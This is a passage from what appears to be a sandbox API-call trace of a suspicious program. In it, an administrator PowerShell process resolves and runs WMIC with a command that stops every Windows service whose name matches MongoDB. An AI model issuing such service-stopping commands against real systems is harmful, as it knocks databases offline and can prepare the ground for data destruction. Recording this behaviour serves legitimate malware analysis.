cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.908] SetErrorMode (uMode=0x1) returned 0x1 [0256.908] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0256.908] SetErrorMode (uMode=0x1) returned 0x1 [0256.908] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.909] SetErrorMode (uMode=0x1) returned 0x1 [0256.909] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0256.909] SetErrorMode (uMode=0x1) returned 0x1 [0256.909] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.909] SetErrorMode (uMode=0x1) returned 0x1 [0256.910] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0256.910] SetErrorMode (uMode=0x1) returned 0x1 [0256.910] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.910] SetErrorMode (uMode=0x1) returned 0x1 [0256.910] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0256.910] SetErrorMode (uMode=0x1) returned 0x1 [0256.911] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.911] SetErrorMode (uMode=0x1) returned 0x1 [0256.911] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0256.911] SetErrorMode (uMode=0x1) returned 0x1 [0256.911] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.912] SetErrorMode (uMode=0x1) returned 0x1 [0256.912] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0256.912] SetErrorMode (uMode=0x1) returned 0x1 [0256.912] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.912] SetErrorMode (uMode=0x1) returned 0x1 [0256.912] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0256.913] SetErrorMode (uMode=0x1) returned 0x1 [0256.913] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.913] SetErrorMode (uMode=0x1) returned 0x1 [0256.913] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0256.913] SetErrorMode (uMode=0x1) returned 0x1 [0256.913] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.914] SetErrorMode (uMode=0x1) returned 0x1 [0256.914] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0256.914] SetErrorMode (uMode=0x1) returned 0x1 [0256.914] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.914] SetErrorMode (uMode=0x1) returned 0x1 [0256.914] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0256.915] SetErrorMode (uMode=0x1) returned 0x1 [0256.915] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.915] SetErrorMode (uMode=0x1) returned 0x1 [0256.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0256.915] SetErrorMode (uMode=0x1) returned 0x1 [0256.915] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.916] SetErrorMode (uMode=0x1) returned 0x1 [0256.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0256.916] SetErrorMode (uMode=0x1) returned 0x1 [0256.916] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.916] SetErrorMode (uMode=0x1) returned 0x1 [0256.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0256.917] SetErrorMode (uMode=0x1) returned 0x1 [0256.917] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.917] SetErrorMode (uMode=0x1) returned 0x1 [0256.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0256.919] SetErrorMode (uMode=0x1) returned 0x1 [0256.919] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.919] SetErrorMode (uMode=0x1) returned 0x1 [0256.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0256.920] SetErrorMode (uMode=0x1) returned 0x1 [0256.920] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1ff0a0 [0256.920] FindNextFileW (in: hFindFile=0x1ff0a0, lpFindFileData=0x1c98d3b0 | out: lpFindFileData=0x1c98d3b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0256.920] FindClose (in: hFindFile=0x1ff0a0 | out: hFindFile=0x1ff0a0) returned 1 [0256.921] SetErrorMode (uMode=0x1) returned 0x1 [0256.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c98d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0256.921] SetErrorMode (uMode=0x1) returned 0x1 [0256.921] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c98d6d0 | out: lpFileInformation=0x1c98d6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0256.921] SetErrorMode (uMode=0x1) returned 0x1 [0256.922] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1040 [0256.922] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c98d8b8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c98d8b8) returned 0x4550 [0256.923] CoTaskMemFree (pv=0x1b9b1040) [0256.923] GetConsoleWindow () returned 0x5011e [0256.924] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0256.924] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0256.924] CoTaskMemFree (pv=0x2af8c0) [0256.924] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0256.924] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0256.925] CoTaskMemFree (pv=0x2af8c0) [0256.925] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice", pNumArgs=0x1c98d900 | out: pNumArgs=0x1c98d900) returned 0x1ee760*="" [0256.925] lstrlenW (lpString="path") returned 4 [0256.925] CoTaskMemAlloc (cb=0xc) returned 0x1b9f1020 [0256.925] RtlMoveMemory (in: Destination=0x1b9f1020, Source=0x1ee7a2, Length=0xa | out: Destination=0x1b9f1020) [0256.925] CoTaskMemFree (pv=0x1b9f1020) [0256.925] lstrlenW (lpString="Win32_Service") returned 13 [0256.925] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1040 [0256.925] RtlMoveMemory (in: Destination=0x1b9b1040, Source=0x1ee7ac, Length=0x1c | out: Destination=0x1b9b1040) [0256.925] CoTaskMemFree (pv=0x1b9b1040) [0256.925] lstrlenW (lpString="where") returned 5 [0256.925] CoTaskMemAlloc (cb=0xe) returned 0x1b9f1020 [0256.925] RtlMoveMemory (in: Destination=0x1b9f1020, Source=0x1ee7c8, Length=0xc | out: Destination=0x1b9f1020) [0256.925] CoTaskMemFree (pv=0x1b9f1020) [0256.925] lstrlenW (lpString="name like '%%MongoDB%%'") returned 23 [0256.925] CoTaskMemAlloc (cb=0x32) returned 0x1b9c71f0 [0256.925] RtlMoveMemory (in: Destination=0x1b9c71f0, Source=0x1ee7d4, Length=0x30 | out: Destination=0x1b9c71f0) [0256.925] CoTaskMemFree (pv=0x1b9c71f0) [0256.925] lstrlenW (lpString="call") returned 4 [0256.925] CoTaskMemAlloc (cb=0xc) returned 0x1b9f1020 [0256.925] RtlMoveMemory (in: Destination=0x1b9f1020, Source=0x1ee804, Length=0xa | out: Destination=0x1b9f1020) [0256.925] CoTaskMemFree (pv=0x1b9f1020) [0256.926] lstrlenW (lpString="stopservice") returned 11 [0256.926] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1040 [0256.926] RtlMoveMemory (in: Destination=0x1b9b1040, Source=0x1ee80e, Length=0x18 | out: Destination=0x1b9b1040) [0256.926] CoTaskMemFree (pv=0x1b9b1040) [0256.926] LocalFree (hMem=0x1ee760) returned 0x0 [0256.926] CoTaskMemAlloc (cb=0x804) returned 0x1b9f1790 [0256.926] GetConsoleTitleW (in: lpConsoleTitle=0x1b9f1790, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0256.926] CoTaskMemFree (pv=0x1b9f1790) [0256.927] CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0256.927] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c98d860*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30b1548 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice", lpProcessInformation=0x30b1548*(hProcess=0x550, hThread=0x554, dwProcessId=0x528, dwThreadId=0x730)) returned 1 [0256.935] CoTaskMemFree (pv=0x253f20) [0256.935] CloseHandle (hObject=0x554) returned 1 [0256.935] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1040 [0256.935] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c98d908, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c98d908) returned 0x4550 [0256.936] CoTaskMemFree (pv=0x1b9b1040) [0256.936] GetCurrentProcess () returned 0xffffffffffffffff [0256.936] GetCurrentProcess () returned 0xffffffffffffffff [0256.936] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x550, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c98d9e8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c98d9e8*=0x554) returned 1 [0257.822] CloseHandle (hObject=0x554) returned 1 [0257.822] GetExitCodeProcess (in: hProcess=0x550, lpExitCode=0x1c98da58 | out: lpExitCode=0x1c98da58*=0x0) returned 1 [0257.822] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0257.823] CloseHandle (hObject=0x550) returned 1 [0257.824] SetEvent (hEvent=0x690) returned 1 [0257.824] SetEvent (hEvent=0x3f4) returned 1 [0257.824] SetEvent (hEvent=0x3f8) returned 1 [0257.824] SetEvent (hEvent=0x3fc) returned 1 [0257.824] SetEvent (hEvent=0x6a0) returned 1 [0257.824] SetEvent (hEvent=0x694) returned 1 [0257.824] SetEvent (hEvent=0x698) returned 1 [0257.824] SetEvent (hEvent=0x69c) returned 1 [0257.824] SetEvent (hEvent=0x6a4) returned 1 [0257.824] CoUninitialize () Thread: id = 244 os_tid = 0x5c4 [0257.852] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0257.854] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0257.855] VirtualQuery (in: lpAddress=0x1c8ed0a0, lpBuffer=0x1c8edf60, dwLength=0x30 | out: lpBuffer=0x1c8edf60*(BaseAddress=0x1c8ed000, AllocationBase=0x1bf60000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0257.856] VirtualQuery (in: lpAddress=0x1c8ed350, lpBuffer=0x1c8ee210, dwLength=0x30 | out: lpBuffer=0x1c8ee210*(BaseAddress=0x1c8ed000, AllocationBase=0x1bf60000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0257.859] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0257.859] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0257.859] CoTaskMemFree (pv=0x2af8c0) [0257.859] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0257.859] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0257.859] CoTaskMemFree (pv=0x2af8c0) [0257.860] CoTaskMemAlloc (cb=0x20e) returned 0x2bd820 [0257.860] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bd820 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0257.860] CoTaskMemFree (pv=0x2bd820) [0257.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0257.860] SetErrorMode (uMode=0x1) returned 0x1 [0257.860] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.861] SetErrorMode (uMode=0x1) returned 0x1 [0257.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0257.861] SetErrorMode (uMode=0x1) returned 0x1 [0257.861] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.861] SetErrorMode (uMode=0x1) returned 0x1 [0257.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0257.862] SetErrorMode (uMode=0x1) returned 0x1 [0257.862] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.862] SetErrorMode (uMode=0x1) returned 0x1 [0257.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0257.862] SetErrorMode (uMode=0x1) returned 0x1 [0257.862] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.863] SetErrorMode (uMode=0x1) returned 0x1 [0257.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0257.863] SetErrorMode (uMode=0x1) returned 0x1 [0257.863] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.863] SetErrorMode (uMode=0x1) returned 0x1 [0257.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", 